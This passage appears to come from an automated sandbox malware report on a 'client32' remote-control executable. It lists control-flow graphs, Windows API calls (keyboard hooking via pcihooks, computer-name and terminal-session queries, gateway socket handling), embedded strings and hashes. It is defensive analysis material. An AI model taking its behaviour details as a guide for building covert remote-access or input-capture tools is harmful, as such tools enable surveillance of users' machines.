                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                                                                                                                                    • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                                                                                                                    • API String ID: 3874234733-2061581830
                                                                                                                                                                                                    • Opcode ID: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
                                                                                                                                                                                                    • Instruction ID: 7823fe44ffa72cf0609a50e83b8fe1e4d3ef80fae5d5290087d1941409006158
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A413F70A00B05AFD7209F7A8CC8E6AFBF8FF59715B04496EE485D3690E774E8408B59
                                                                                                                                                                                                    Function 1113DAD0 Relevance: 54.5, APIs: 14, Strings: 17, Instructions: 266libraryloaderregistryCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1498 1113dad0-1113db15 call 11142a60 1501 1113dba7-1113dbd3 call 1113f4f0 call 111434f0 LoadLibraryA 1498->1501 1502 1113db1b-1113db3d call 1105d340 1498->1502 1514 1113dc07 1501->1514 1515 1113dbd5-1113dbdc 1501->1515 1507 1113db8b-1113db92 1502->1507 1508 1113db3f-1113db5c call 11015e10 1502->1508 1507->1501 1512 1113db94-1113dba0 call 11017670 1507->1512 1517 1113db5e-1113db6b GetProcAddress 1508->1517 1518 1113db6d-1113db6f 1508->1518 1512->1501 1522 1113dba2 call 110cb920 1512->1522 1520 1113dc11-1113dc31 GetClassInfoExA 1514->1520 1515->1514 1519 1113dbde-1113dbe5 1515->1519 1517->1518 1523 1113db71-1113db73 SetLastError 1517->1523 1529 1113db79-1113db82 1518->1529 1519->1514 1524 1113dbe7-1113dc05 call 1105d340 1519->1524 1525 1113dc37-1113dc5f call 1115e4f0 call 11140b20 1520->1525 1526 1113dcd9-1113dd34 1520->1526 1522->1501 1523->1529 1524->1520 1539 1113dc61-1113dc75 call 110290f0 1525->1539 1540 1113dc78-1113dcc0 call 11140b20 call 11140b50 LoadCursorA GetStockObject RegisterClassExA 1525->1540 1541 1113dd36-1113dd3d 1526->1541 1542 1113dd6e-1113dd75 1526->1542 1529->1507 1534 1113db84-1113db85 FreeLibrary 1529->1534 1534->1507 1539->1540 1540->1526 1566 1113dcc2-1113dcd6 call 110290f0 1540->1566 1541->1542 1544 1113dd3f-1113dd46 1541->1544 1546 1113ddb1-1113ddd5 call 1105d340 1542->1546 1547 1113dd77-1113dd86 call 1110c420 1542->1547 1544->1542 1550 1113dd48-1113dd5f call 11129900 LoadLibraryA 1544->1550 1557 1113dde3-1113dde8 1546->1557 1558 1113ddd7-1113dde1 1546->1558 1561 1113ddaa 1547->1561 1562 1113dd88-1113dda8 1547->1562 1550->1542 1565 1113dd61-1113dd69 GetProcAddress 1550->1565 1563 1113ddf4-1113ddfb 1557->1563 1564 1113ddea 1557->1564 1558->1563 1567 1113ddac 1561->1567 1562->1567 1568 1113de08-1113de25 call 11139490 1563->1568 1569 1113ddfd-1113de03 call 110f58a0 1563->1569 1564->1563 1565->1542 1566->1526 1567->1546 1576 1113de2b-1113de32 1568->1576 1577 1113deda-1113deea 1568->1577 1569->1568 1578 1113de34-1113de46 call 1110c420 1576->1578 1579 1113de6f-1113de76 1576->1579 1588 1113de61 1578->1588 1589 1113de48-1113de5f call 11159ed0 1578->1589 1581 1113de78-1113de7f 1579->1581 1582 1113de9f-1113deb0 1579->1582 1584 1113de81 call 11131d10 1581->1584 1585 1113de86-1113de9a SetTimer 1581->1585 1586 1113deb2-1113deb9 1582->1586 1587 1113dec9-1113ded4 #17 LoadLibraryA 1582->1587 1584->1585 1585->1582 1586->1587 1591 1113debb-1113dec2 1586->1591 1587->1577 1593 1113de63-1113de6a 1588->1593 1589->1593 1591->1587 1594 1113dec4 call 1112a760 1591->1594 1593->1579 1594->1587
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113DB64
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1113DB73
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1113DB85
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(imm32,?,?,00000002,00000000), ref: 1113DBC4
                                                                                                                                                                                                    • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 1113DC29
                                                                                                                                                                                                    • _memset.LIBCMT ref: 1113DC3D
                                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 1113DC8F
                                                                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 1113DC9A
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(pcihooks,?,?,00000002,00000000), ref: 1113DD52
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 1113DD67
                                                                                                                                                                                                    • RegisterClassExA.USER32(?), ref: 1113DCB5
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000000,000003E8,11139470), ref: 1113DE94
                                                                                                                                                                                                    • #17.COMCTL32(?,?,?,00000002,00000000), ref: 1113DEC9
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000002,00000000), ref: 1113DED4
                                                                                                                                                                                                      • Part of subcall function 11015E10: LoadLibraryA.KERNEL32(User32.dll), ref: 11015E18
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer__wcstoi64_memset
                                                                                                                                                                                                    • String ID: (r$*DisableDPIAware$*quiet$Client$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                                                                                                                                    • API String ID: 2794364348-3064451846
                                                                                                                                                                                                    • Opcode ID: 571120301c2cbdaac190665f23ae6cd54b107ab8e29346c4d7356b84dcf3b421
                                                                                                                                                                                                    • Instruction ID: eeaa44aaf805afce620a012973528e55005956dd55c3add89e5b481fbdd40cac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 571120301c2cbdaac190665f23ae6cd54b107ab8e29346c4d7356b84dcf3b421
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCB1F674A1122A9FDB02DFE1CD88BADFBB5AB8472EF904138E525972C8F7745040CB56
                                                                                                                                                                                                    Function 1102D679 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319libraryCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1597 1102d679 1598 1102d680-1102d691 1597->1598 1598->1598 1599 1102d693 1598->1599 1600 1102d7d4-1102d7ed call 1113f130 1599->1600 1603 1102d7f3-1102d7f5 1600->1603 1604 1102d670-1102d673 1600->1604 1605 1102d8f3-1102d90d call 111429e0 1603->1605 1606 1102d7fb-1102d801 1603->1606 1607 1102d675-1102d677 1604->1607 1608 1102d698-1102d6a1 1604->1608 1628 1102d963-1102d96f call 1102b120 1605->1628 1629 1102d90f-1102d928 call 1105d340 1605->1629 1611 1102d803-1102d812 call 11141430 1606->1611 1612 1102d818-1102d828 1606->1612 1607->1598 1608->1600 1609 1102d6a7-1102d6ae 1608->1609 1609->1600 1613 1102d7a3-1102d7b8 call 1115f5b7 1609->1613 1614 1102d6b5-1102d6b7 1609->1614 1615 1102d7ba-1102d7cf call 1115f5b7 1609->1615 1616 1102d74a-1102d77d call 1115e091 call 1113e8f0 1609->1616 1617 1102d78b-1102d7a1 call 11160790 1609->1617 1618 1102d73b-1102d745 1609->1618 1619 1102d77f-1102d789 1609->1619 1620 1102d6fc-1102d702 1609->1620 1621 1102d72c-1102d736 1609->1621 1611->1612 1624 1102d82a 1612->1624 1625 1102d82f-1102d84d call 1102c850 1612->1625 1613->1600 1614->1600 1627 1102d6bd-1102d6f7 call 1115e091 call 1113e8f0 call 1102c850 1614->1627 1615->1600 1616->1600 1617->1600 1618->1600 1619->1600 1631 1102d704-1102d718 call 1115f5b7 1620->1631 1632 1102d71d-1102d727 1620->1632 1621->1600 1624->1625 1625->1605 1649 1102d853-1102d878 call 110b6bd0 call 11142a60 1625->1649 1627->1600 1653 1102d971-1102d978 1628->1653 1654 1102d948-1102d94f 1628->1654 1629->1628 1657 1102d92a-1102d93c 1629->1657 1631->1600 1632->1600 1680 1102d883-1102d889 1649->1680 1681 1102d87a-1102d881 1649->1681 1659 1102d955-1102d958 1653->1659 1662 1102d97a-1102d984 1653->1662 1654->1659 1660 1102db5a-1102db7b GetComputerNameA 1654->1660 1657->1628 1674 1102d93e 1657->1674 1669 1102d95a-1102d961 call 110b6bd0 1659->1669 1670 1102d989 1659->1670 1667 1102dbb3-1102dbb9 1660->1667 1668 1102db7d-1102dbb1 call 110278a0 1660->1668 1662->1660 1671 1102dbbb-1102dbc0 1667->1671 1672 1102dbef-1102dc02 call 11160790 1667->1672 1668->1667 1699 1102dc07-1102dc13 1668->1699 1677 1102d98c-1102da66 call 11027550 call 11027850 call 11027550 * 2 LoadLibraryA GetProcAddress 1669->1677 1670->1677 1679 1102dbc6-1102dbca 1671->1679 1697 1102ddf7-1102de1a 1672->1697 1674->1654 1728 1102db2a-1102db32 SetLastError 1677->1728 1729 1102da6c-1102da83 1677->1729 1685 1102dbe6-1102dbe8 1679->1685 1686 1102dbcc-1102dbce 1679->1686 1688 1102d88b-1102d892 call 110279d0 1680->1688 1689 1102d8e9 1680->1689 1681->1605 1695 1102dbeb-1102dbed 1685->1695 1692 1102dbe2-1102dbe4 1686->1692 1693 1102dbd0-1102dbd6 1686->1693 1688->1689 1704 1102d894-1102d8c6 1688->1704 1689->1605 1692->1695 1693->1685 1700 1102dbd8-1102dbe0 1693->1700 1695->1672 1695->1699 1708 1102de42-1102de4a 1697->1708 1709 1102de1c-1102de22 1697->1709 1705 1102dc15-1102dc2a call 110b6bd0 call 11029870 1699->1705 1706 1102dc2c-1102dc3f call 11080b10 1699->1706 1700->1679 1700->1692 1726 1102d8d0-1102d8df call 110f3da0 1704->1726 1727 1102d8c8-1102d8ce 1704->1727 1740 1102dc83-1102dc9c call 11080b10 1705->1740 1724 1102dc41-1102dc64 1706->1724 1725 1102dc66-1102dc68 1706->1725 1716 1102de5c-1102dee8 call 1115e091 * 2 call 11142a60 * 2 GetCurrentProcessId call 110ebb00 call 11027900 call 11142a60 call 1115e4d1 1708->1716 1717 1102de4c-1102de59 call 1113f120 call 1115e091 1708->1717 1709->1708 1714 1102de24-1102de3d call 1102cde0 1709->1714 1714->1708 1717->1716 1724->1740 1733 1102dc70-1102dc81 1725->1733 1734 1102d8e2-1102d8e4 call 1102cde0 1726->1734 1727->1726 1727->1734 1742 1102daf3-1102daff 1728->1742 1729->1742 1751 1102da85-1102da8e 1729->1751 1733->1733 1733->1740 1734->1689 1761 1102dca2-1102dd1d call 11142a60 call 110cd950 call 110cf1b0 call 110b6bd0 wsprintfA call 110b6bd0 wsprintfA 1740->1761 1762 1102dddc-1102dde9 call 11160790 1740->1762 1749 1102db42-1102db51 1742->1749 1750 1102db01-1102db0d 1742->1750 1749->1660 1755 1102db53-1102db54 FreeLibrary 1749->1755 1752 1102db1f-1102db23 1750->1752 1753 1102db0f-1102db1d GetProcAddress 1750->1753 1751->1742 1759 1102da90-1102dac6 call 11142a60 call 11128350 1751->1759 1757 1102db34-1102db36 SetLastError 1752->1757 1758 1102db25-1102db28 1752->1758 1753->1752 1755->1660 1765 1102db3c 1757->1765 1758->1765 1759->1742 1781 1102dac8-1102daee call 11142a60 call 11027590 1759->1781 1797 1102dd33-1102dd49 call 11125f90 1761->1797 1798 1102dd1f-1102dd2e call 110290f0 1761->1798 1774 1102ddec-1102ddf1 CharUpperA 1762->1774 1765->1749 1774->1697 1781->1742 1802 1102dd62-1102dd9c call 110ce900 * 2 1797->1802 1803 1102dd4b-1102dd5d call 110ce900 1797->1803 1798->1797 1810 1102ddb2-1102ddda call 11160790 call 110ce4f0 1802->1810 1811 1102dd9e-1102ddad call 110290f0 1802->1811 1803->1802 1810->1774 1811->1810
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,?,?,?,?,00000100), ref: 1102D9E1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: $30/10/15 13:45:13 V12.10F4$305090$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                                                                    • API String ID: 1029625771-1136126593
                                                                                                                                                                                                    • Opcode ID: ae16968fb801e45ed27c47994a58d337414de700442e9fa67dc2dbce8f1ce6b8
                                                                                                                                                                                                    • Instruction ID: 3410179eeb5a9037d1fa1f4c8bb60b9922e488a50ebb30bdceadca7c29897b10
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae16968fb801e45ed27c47994a58d337414de700442e9fa67dc2dbce8f1ce6b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03C1C375E0026A9FDB22DF948C90BEDF7B9BB44308F9044EDE559A7240E7706E80CB61
                                                                                                                                                                                                    Function 685963C0 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 181libraryloadersleepCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1817 685963c0-68596402 call 685b4710 EnterCriticalSection InterlockedDecrement 1820 68596408-6859641f EnterCriticalSection 1817->1820 1821 685965ed-68596608 LeaveCriticalSection call 685b28e1 1817->1821 1823 685964da-685964e0 1820->1823 1824 68596425-68596431 1820->1824 1827 685965bd-685965e8 call 685b1c50 LeaveCriticalSection 1823->1827 1828 685964e6-685964f0 shutdown 1823->1828 1825 68596443-68596447 1824->1825 1826 68596433-68596441 GetProcAddress 1824->1826 1830 68596449-6859644c 1825->1830 1831 6859644e-68596450 SetLastError 1825->1831 1826->1825 1827->1821 1832 6859650a-6859652d timeGetTime #16 1828->1832 1833 685964f2-68596507 GetLastError call 685930a0 1828->1833 1835 68596456-68596465 1830->1835 1831->1835 1837 6859656c-6859656e 1832->1837 1838 6859652f 1832->1838 1833->1832 1842 68596477-6859647b 1835->1842 1843 68596467-68596475 GetProcAddress 1835->1843 1840 68596570-6859657b closesocket 1837->1840 1845 68596551-6859656a #16 1838->1845 1846 68596531 1838->1846 1847 6859657d-6859658a WSAGetLastError 1840->1847 1848 685965b6 1840->1848 1849 6859647d-68596480 1842->1849 1850 68596482-68596484 SetLastError 1842->1850 1843->1842 1845->1837 1845->1838 1846->1845 1851 68596533-6859653e GetLastError 1846->1851 1852 6859658c-6859658e Sleep 1847->1852 1853 68596594-68596598 1847->1853 1848->1827 1854 6859648a-68596499 1849->1854 1850->1854 1851->1837 1855 68596540-68596547 timeGetTime 1851->1855 1852->1853 1853->1840 1856 6859659a-6859659c 1853->1856 1858 685964ab-685964af 1854->1858 1859 6859649b-685964a9 GetProcAddress 1854->1859 1855->1837 1860 68596549-6859654b Sleep 1855->1860 1856->1848 1863 6859659e-685965b3 GetLastError call 685930a0 1856->1863 1861 685964b1-685964be 1858->1861 1862 685964c3-685964d5 SetLastError 1858->1862 1859->1858 1860->1845 1861->1827 1862->1827 1863->1848
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(685DB898,00000000,?,00000000,?,6859D77B,00000000), ref: 685963E8
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 685963FA
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6859D77B,00000000), ref: 68596412
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6859643B
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,00000000,?,6859D77B,00000000), ref: 68596450
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6859646F
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,00000000,?,6859D77B,00000000), ref: 68596484
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 685964A3
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,00000000,?,6859D77B,00000000), ref: 685964C5
                                                                                                                                                                                                    • shutdown.WSOCK32(?,00000001,?,00000000,?,6859D77B,00000000), ref: 685964E9
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000001,?,00000000,?,6859D77B,00000000), ref: 685964F2
                                                                                                                                                                                                    • timeGetTime.WINMM(?,00000001,?,00000000,?,6859D77B,00000000), ref: 68596510
                                                                                                                                                                                                    • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596526
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596533
                                                                                                                                                                                                    • timeGetTime.WINMM(?,00000000,?,6859D77B,00000000), ref: 68596540
                                                                                                                                                                                                    • Sleep.KERNEL32(00000001,?,00000000,?,6859D77B,00000000), ref: 6859654B
                                                                                                                                                                                                    • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596563
                                                                                                                                                                                                    • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 68596574
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 6859657D
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 6859658E
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6859D77B,00000000), ref: 6859659E
                                                                                                                                                                                                    • _memset.LIBCMT ref: 685965C8
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,6859D77B,00000000), ref: 685965D7
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(685DB898,?,00000000,?,6859D77B,00000000), ref: 685965F2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                                                                                                                                    • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                                                                                                                                    • API String ID: 3764039262-2631155478
                                                                                                                                                                                                    • Opcode ID: 46e70ae2b76cb51ca48c480c54ac7e9f41fd60fc7245b0e472c8da1468b8f531
                                                                                                                                                                                                    • Instruction ID: 369a002f3b48f126020b325555e63da1069fb9b65c6b3de85ce35cf1eb95a096
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46e70ae2b76cb51ca48c480c54ac7e9f41fd60fc7245b0e472c8da1468b8f531
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46518275640340AFDB10EFA8C888B9A77F9EF89315FD14515EE1AD7280DB70E888CB95
                                                                                                                                                                                                    Function 685998D0 Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 346COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
